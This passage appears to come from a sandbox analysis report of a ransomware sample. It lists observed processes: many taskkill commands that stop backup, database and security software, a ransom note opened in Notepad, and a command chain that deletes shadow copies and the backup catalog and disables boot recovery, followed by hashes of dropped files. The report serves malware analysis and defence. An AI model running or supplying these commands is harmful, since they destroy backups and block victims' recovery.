C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sql*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM svc$*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM memtas*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM backup*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxVss*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxBlr*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxFWD*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCVD*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCIMgr*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM DefWatch*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ccEvtMgr*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM SavRoam*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM RTVscan*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBFCService*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Intuit.QuickBooks.FCS*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooBackup*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooIT*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM zhudongfangyu*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM stc_raw_agent*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VSNAPVSS*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBCFMonitorService*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamTransportSvc*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamDeploymentService*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamNFSSvc*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM PDVFSService*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecVSSProvider*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentAccelerator*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecRPCService*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcrSch2Svc*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcronisAgent*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CASAD2DWebSvc*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CAARCUpdateSvc*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM TeamViewer*3⤵
-
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\README.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
24KB
MD54e9962558e74db5038d8073a5b3431aa
SHA13cd097d9dd4b16a69efbb0fd1efe862867822146
SHA2566f81212bd841eca89aa6f291818b4ad2582d7cdb4e488adea98261494bdcd279
SHA512fcd76bca998afc517c87de0db6ee54e45aa2263fa7b91653ac3adb34c41f3681fbe19d673ae9b24fdf3d53f5af4e4968e603a1eb557207f8860ac51372026b2e
-
Filesize
4KB
MD5196d785ebbb4c59a4581a688cf89f25a
SHA15764ba17b0f0eff3b3ee2feaa16254c7558ea231
SHA256785f870959e083ea25f61ed88d3a6e87467a25449c5c34bac6da9e6aeec4ae40
SHA512b53262aa2986cb523b26fda77efa921d394826068a9a66e60d3ca6de58b7f14b5f5451bb8e85809539fbd04ce420e8ee374509023835788b8ab9f95ae5df1ee7
-
Filesize
660B
MD5900263477e1368869fbf1be99990c878
SHA1e56e199aa4119f3cc4c4d46f96daea89bbf9685a
SHA2567f660d9db521646e9c6510d844b6c6ea26716b620c46f34edaf7ce318a9473e4
SHA5121035b388b4b00c744824d13c5ef48118d88abbb53e9d76896a2d96a2a127a7739c119e781d7d5f0b8d910e10539c0c502c9f937fc2487747c65e7285f4b1e6d2
-
Filesize
6KB
MD594c183b842784d0ae69f8aa57c8ac015
SHA1c5b1ebc2b5c140ccbb21cd377ca18f3c5d0b80cd
SHA256aa5c4d50684aa478d5982e509cbf1f8347fbc9cc75cb847d54915c16c3a33d25
SHA5125808ddb81657acf4712fa845c95aacbab32a414ffda3b9d1218637e2d53bd3e0d6b95c872779ead6eaa13b4d2d563494ad5587337958bd17f1e791fad5d822fb
-
Filesize
1KB
MD58c31feb9c3faaa9794aa22ce9f48bfbd
SHA1f5411608a15e803afc97961b310bb21a6a8bd5b6
SHA2566016fd3685046b33c7a2b1e785ac757df20e7c760abe0c27e1b8b0294222421d
SHA512ba4b5886c04ba8f7a7dbb87e96d639783a5969a245de181cf620b8f536e3ac95bbd910cd2f1f6aae6c3cd70fc1ef6209dc10d2b083ec51861b51d83f95811baa
-
Filesize
68KB
MD5d976a6a2df47aff5f7b6c91f8b11f0e8
SHA1332c9e8cf5b61aa1025372fdbe6fa282ee9604a2
SHA256cf839583b2b0430edd947eb02210e6a29dbdd3024bc94157f02a201308a91972
SHA512ef05f3d1b984563055f773a7458178c13e26af799e96d1eb26ecfe44ff4ef2adc8eb8aa3be926167cafe116a7eb1e189ef899a88d4c48a9093f90460a28128df
-
Filesize
1KB
MD59c7457097ea03210bdf62a42709d09d7
SHA11f71e668d7d82d6e07a0a4c5a5e236929fc181fc
SHA2569555aa7dc9216c969baf96676de9182692816d257cec8f49c5620225357c4967
SHA512e00b3b66e0999dd4b035183adf9f741ff14087085c5d2a240a16e5f25abf18c93454824cd3473c2f122914dab9920dec8163aafd9e3db19a27301d7f58a38b55
-
Filesize
34B
MD5cd0395742b85e2b669eaec1d5f15b65b
SHA143c81d1c62fc7ff94f9364639c9a46a0747d122e
SHA2562b4a47b82cbe70e34407c7df126a24007aff8b45d5716db384d27cc1f3b30707
SHA5124df2ce734e2f7bc5f02bb7845ea801b57dcf649565dd94b1b71f578b453ba0a17c61ccee73e7cff8f23cdd6aa37e55be5cb15f4767ff88a9a06de3623604fbf0
-
Filesize
355B
MD5ec39f54d3e06add038f88fa50834f5cd
SHA1d75e83855e29d1bc776c0fe96dd2a0726bf6d3c4
SHA2560a48c92dcb63ddaf421f916fe6bb1c62813f256a4a06a4fe9f6df81e2a43e95b
SHA51291548200f6556f9872f87b8a244c03c98f8fc26be0c861127fcebaa504f31b7d72ef543d84db1ff7d3400bbd4500a1cb92d1b0b3a925378b8c56d526511d0d9b
-
Filesize
917B
MD51f3b083260019eef6691121d5099d3e8
SHA144ffccd3293b17344816b76be4ede5a58ac7c9a5
SHA256ecdfa6251eab1b8928ca8d9cd8842f137c1ce241c7e9bbbc53474286b46d9600
SHA512ab5d9097fe90d596d69c33e0e51c155624027e05bb9c85eb0388b2acd86debbffcd2c1c58496875906c97ff3e8a7547040799a35f5277a12bfc4f60597c52c4a
-
Filesize
91B
MD570e7fb4d4f0bfd58022da440f4ff670b
SHA11e3aeb8d627db63aa31f19a1d6ec1e33571f297e
SHA256e7be4221cf5029e817e664829ecb5e6d2d2fe785505214a8c00c75f86ac59808
SHA5126751d4a176a2e2394364f12c28506e6568b928d76f35c27529b7e0c8b0bff5941c2ead5036393a3b24846f5293b6e2a920505da7d125a1f374f9a68cce1318d6
-
Filesize
36B
MD57f077f40c2d1ce8e95faa8fdb23ed8b4
SHA12c329e3e20ea559974ddcaabc2c7c22de81e7ad2
SHA256bda08f8b53c121bbc03da1f5c870c016b06fa620a2c02375988555dd12889cdf
SHA512c1fb5d40491ae22a155a9bd115c32cbe9dbcba615545af2f1a252475f9d59844763cd7c177f08277d8ef59e873b7d885fda17f2a504d9ec2c181d0f793cb542b
-
Filesize
32B
MD54ec1eda0e8a06238ff5bf88569964d59
SHA1a2e78944fcac34d89385487ccbbfa4d8f078d612
SHA256696e930706b5d391eb8778f73b0627ffc2be7f6c9a3e7659170d9d37fc4a97b5
SHA512c9b1ed7b61f26d94d7f5eded2d42d40f3e4300eee2319fe28e04b25cdb6dd92daf67828bff453bf5fc8d7b6ceb58cab319fc0daac9b0050e27a89efe74d2734e
-
Filesize
9KB
MD5643a118f249a643d00a0e0ba251c2558
SHA15dbb890960534df2fb083bec1f5a5d3dbc83e47e
SHA2565dac8767cc89776637ba4888bd39b57044f6c12d35ed8ed8ecf717e3d1b39d66
SHA512a7f854a091540a83dccf4acf138c3443ce74025a3c3f24cb38bc41752b49924ddf4377afbfc901f38d7da395e2e83a0dce50fc45e8a6eb6a2a3f87163a183d6a
-
Filesize
172B
MD596fd20998ace419a0c394dc95ad4318c
SHA153a0a2818989c3472b29cdb803ee97bb2104ce54
SHA256282a71ac3395f934ba446a3836c1f1466743f523a85186e74c44c1aef1b596c1
SHA512d59ed718eea906fc25f27e0efe0bfe45fa807ef7050b9c7065c076996885890837eb51579aa79d0121586aa9cecc292d4e1b1e6a7236dbafe90c5601d5401545
-
Filesize
75B
MD5c6c7f3ee1e17acbff6ac22aa89b02e4e
SHA1bdbd0220e54b80b3d2ffbbddadc89bfbb8e64a8b
SHA256a2f9f27d6938a74979d34484bced535412969c2533dc694bfa667fe81d66d7d4
SHA51286ed28ffdd00b4a397a20968792fcd30dd4a891a187a7789c00c88b64689b334a11fa087eb54ccee813c181cf891b43184dde7af9a6f33caed2a71e2c445a7b4
-
Filesize
2KB
MD537a70ee6ab90aa2fd3dd7416e76675a6
SHA1e57ff483f1085d428ec6e22159c1547a2b3d2718
SHA256c73e3c71829a98d11e48924e4df126e0c265f21b62b1aa7ac27033f7554abcb8
SHA512e335f6c350ed839911ef1b3cb9b2d12744b37a5bdfd5e7c1535c473d2383b2a5f1dacb5b341474732e9fbb46cc59db5bd371e6bc5dd785b1015d5aa42dcb3f3e
-
Filesize
3KB
MD52e020f44ed4f057648d549c24ec82b15
SHA1d8e0bd6a321e1700c90a54f79dec6d26af7df438
SHA256c33bcaf2f4ff8a8da96d4b6d7493751c5bbbefaacb6a9737b77e3395f5007dfe
SHA51213748044eb4c2eb11011a2967451cabb97a56363b106abf3bf4e6b8ec9c6e71134b5610ba4d1f722c02b9f9d275bbff22468c64d27a6fcf2c9d8980d001ab79f
-
Filesize
96B
MD52615bf9ed6d2e854c0602ef8fdd787df
SHA14e0682a961ee43b9ddce5b3c03c83945d7d0cc40
SHA256a33ee4de5292cb00e1833b85a5dc530240bb5f23ee64a56ae7fa23ae4aabc493
SHA51224ec09d91c3d8d93c7dd595dad8eefd00de24759e039bc4dfc6967291ee54ef2a65b693b02143352a8a7c0e83b372d77389059811927b18f52472ead1332fb8c
-
Filesize
39.2MB
MD5b31a1d7c6d732d78205b619daa8df3f0
SHA127ff179cd5a9ed7a562f62d40c492bc6963b23a0
SHA256b3e9812eb077d65b30adc9b4f86bae472b22d66f8f3c95b2d49756177bbfd4fb
SHA51276d0110eecdb0dbc8185c008f85d040885ae705b09d56f833c7254bb20f3f5a77adf2345d485c9370c5353ac0c8d2385dc90705db300f6dccec4568542847900
-
Filesize
39.2MB
MD5b31a1d7c6d732d78205b619daa8df3f0
SHA127ff179cd5a9ed7a562f62d40c492bc6963b23a0
SHA256b3e9812eb077d65b30adc9b4f86bae472b22d66f8f3c95b2d49756177bbfd4fb
SHA51276d0110eecdb0dbc8185c008f85d040885ae705b09d56f833c7254bb20f3f5a77adf2345d485c9370c5353ac0c8d2385dc90705db300f6dccec4568542847900
-
Filesize
66KB
MD5889e8ff9455bb4837f91ff644dcf2b82
SHA16bc850368a6444885e59d368ab5774cedb6792e2
SHA25656ee941f7f4fcf1e050be3544ad73cfe7a061f288a3af4960632b0fcced94d51
SHA512771af6b48883b408d45c952380ede6ab466efb776360af6bda5c0530332876d62b127803e4e4cef7e68dc64f829603cb939dbdc2d8cafe3d08dc954b796f2fa4
-
Filesize
569B
MD56ae5c2395170e2d6d29d4f1e95e676e6
SHA1533905ab44c6c68b58212f62202549646e23f2f6
SHA256c12e04bcf0c4bd14dcbb50cc96416c77080ffc4bac7fb784d462ee6d6d163d6f
SHA512492b0f4e8d4783194438f6be9d432bc008b7d72a31dbaf9aca5714e276ee13f8310408f379f165ec4ac63eb59404899c772f471a48a785ad8fd79c1cd9bfc80e
-
Filesize
122KB
MD5f83cd0592ef46ff26c4b81f3ebbeec1c
SHA19a99d054675e7fa659188e1057a271b4b59c6e78
SHA2562c070169ac950517fd5e828e309fb0e27ad24cfc94dfbc2c3de5f6a9adbc8d7b
SHA5126c3576a275fb7da04c982682999ebaed346af757e88f2b5d12cc1ecaf3bb9639a458a2e207f69d5fa04dd03272e831d1c07e0a7c46beb28c2a51ef93425b2df9
-
Filesize
325KB
MD5adac0cee5cc4de7d4046ae1243e41bf0
SHA1c8d6d92f0dbee64d0f4c0930f0d2699a8253e891
SHA25668d0e444c0b27552d2cb86501dcb7db3fd64b82d966e9708db0408ec1ba38c79
SHA5121d7af604540532a4121850760b1e401bb6356e59503c26f3d1fa358a105b7d88362c92f78aa4394095b165f06c484b8c2d2ed640380e85ef9b3eb087d3e7c869
-
Filesize
325KB
MD5adac0cee5cc4de7d4046ae1243e41bf0
SHA1c8d6d92f0dbee64d0f4c0930f0d2699a8253e891
SHA25668d0e444c0b27552d2cb86501dcb7db3fd64b82d966e9708db0408ec1ba38c79
SHA5121d7af604540532a4121850760b1e401bb6356e59503c26f3d1fa358a105b7d88362c92f78aa4394095b165f06c484b8c2d2ed640380e85ef9b3eb087d3e7c869
-
Filesize
325KB
MD5adac0cee5cc4de7d4046ae1243e41bf0
SHA1c8d6d92f0dbee64d0f4c0930f0d2699a8253e891
SHA25668d0e444c0b27552d2cb86501dcb7db3fd64b82d966e9708db0408ec1ba38c79
SHA5121d7af604540532a4121850760b1e401bb6356e59503c26f3d1fa358a105b7d88362c92f78aa4394095b165f06c484b8c2d2ed640380e85ef9b3eb087d3e7c869
-
Filesize
1.6MB
MD5838ae3dbeff52602990b920a75ec58f3
SHA19f5e1638eb907f9baa63878fa8862898342554f4
SHA25636e8d88612cfa55958f118871c346fa4ea42c19cbc90ecdea4885104089439a4
SHA512414897ea9c51e2ae9c596cb1ef61bcfcea2c33eb08530dc6f9bec19a7ef9fbf73cbe9326cd3bae3a3590504d751af654d6b163ed315d598dce5310ca067c3266
-
Filesize
1.6MB
MD5838ae3dbeff52602990b920a75ec58f3
SHA19f5e1638eb907f9baa63878fa8862898342554f4
SHA25636e8d88612cfa55958f118871c346fa4ea42c19cbc90ecdea4885104089439a4
SHA512414897ea9c51e2ae9c596cb1ef61bcfcea2c33eb08530dc6f9bec19a7ef9fbf73cbe9326cd3bae3a3590504d751af654d6b163ed315d598dce5310ca067c3266
-
Filesize
46KB
MD5f7b1a64333ab633f980b702723fb7cba
SHA1e7e04a69a84c5a9e7d0901eb00face35457a0df1
SHA256e7bde6768de9a7a1b1028d7fa52548f8c074b7355820b7a1cb2d4c2c082512d2
SHA512666d09200f0bc1762903fcfb748335d1fec27cf2cd9723a91d2ad870468b94236ad7c15ed453446accc415f0be5d40f006d57695204fd7fa30c676a8e6d2ecad
-
Filesize
46KB
MD5f7b1a64333ab633f980b702723fb7cba
SHA1e7e04a69a84c5a9e7d0901eb00face35457a0df1
SHA256e7bde6768de9a7a1b1028d7fa52548f8c074b7355820b7a1cb2d4c2c082512d2
SHA512666d09200f0bc1762903fcfb748335d1fec27cf2cd9723a91d2ad870468b94236ad7c15ed453446accc415f0be5d40f006d57695204fd7fa30c676a8e6d2ecad
-
Filesize
66KB
MD5889e8ff9455bb4837f91ff644dcf2b82
SHA16bc850368a6444885e59d368ab5774cedb6792e2
SHA25656ee941f7f4fcf1e050be3544ad73cfe7a061f288a3af4960632b0fcced94d51
SHA512771af6b48883b408d45c952380ede6ab466efb776360af6bda5c0530332876d62b127803e4e4cef7e68dc64f829603cb939dbdc2d8cafe3d08dc954b796f2fa4
-
Filesize
556B
MD5a08e9477bcf35558054417f16a5f5617
SHA15853ada9553643a039b1b56324f0c95226179c44
SHA2567ef40c0cf01ec60f42ace3924716f5ccef0f5eea84bd8f9006016ddbfcdf36d2
SHA5122f7950f9462fb26dfbd133311f2c0403929eef6c75abe416d55ca8e88dceaef15021e294c3ea683d221ae22ba7acac33c63d80d441adf28fa8ffd67a577b11b2
-
Filesize
122KB
MD5f83cd0592ef46ff26c4b81f3ebbeec1c
SHA19a99d054675e7fa659188e1057a271b4b59c6e78
SHA2562c070169ac950517fd5e828e309fb0e27ad24cfc94dfbc2c3de5f6a9adbc8d7b
SHA5126c3576a275fb7da04c982682999ebaed346af757e88f2b5d12cc1ecaf3bb9639a458a2e207f69d5fa04dd03272e831d1c07e0a7c46beb28c2a51ef93425b2df9
-
Filesize
936KB
-
Filesize
10.8MB
-
Filesize
72KB
-
Filesize
40KB
-
Filesize
40KB
-
Filesize
584KB
-
Filesize
5.6MB
-
Filesize
39.3MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
944KB
-
Filesize
624KB
-
Filesize
496KB
-
Filesize
408KB
-
Filesize
352KB
-
Filesize
1.6MB
-
Filesize
2.0MB
-
Filesize
272KB
-
Filesize
72KB
-
Filesize
472KB
-
Filesize
3.4MB
-
Filesize
192KB
-
Filesize
2.5MB
-
Filesize
1.5MB
-
Filesize
6.0MB
-
Filesize
704KB
-
Filesize
5.4MB
-
Filesize
104KB
-
Filesize
1.1MB
-
Filesize
192KB
-
Filesize
1.4MB
-
Filesize
256KB
-
Filesize
160KB
-
Filesize
944KB
-
Filesize
40KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
40KB
-
Filesize
944KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
40KB
